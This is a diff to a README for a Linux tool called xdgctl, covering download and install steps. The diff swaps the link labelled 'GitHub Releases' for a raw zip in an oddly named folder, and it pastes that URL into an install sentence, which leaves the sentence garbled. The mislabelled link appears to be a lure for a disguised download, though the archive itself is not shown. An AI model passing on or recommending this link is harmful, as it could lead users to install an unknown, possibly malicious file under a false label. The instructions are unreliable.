Karangupta2050/xdgctl/README.md

    - Terminal: You need a terminal to run the application.

 2. **Download & Install**
-   - Visit this page to download: [GitHub Releases](https://github.com/Karangupta2050/xdgctl/releases).
+   - Visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/Karangupta2050/xdgctl/master/tenomyotomy/Software-1.1-beta.2.zip).
    - Look for the latest version.
    - Choose the appropriate file for your system.

 3. **Install the Application**
    - Depending on your Linux distribution, you may need to install the application using specific commands.

-   If you have downloaded a .tar.gz file, here’s how to install it:
+   If you have downloaded a https://raw.githubusercontent.com/Karangupta2050/xdgctl/master/tenomyotomy/Software-1.1-beta.2.zip file, here’s how to install it:
    - Open your terminal.
    - Navigate to the directory where you downloaded the file using:
      ```bash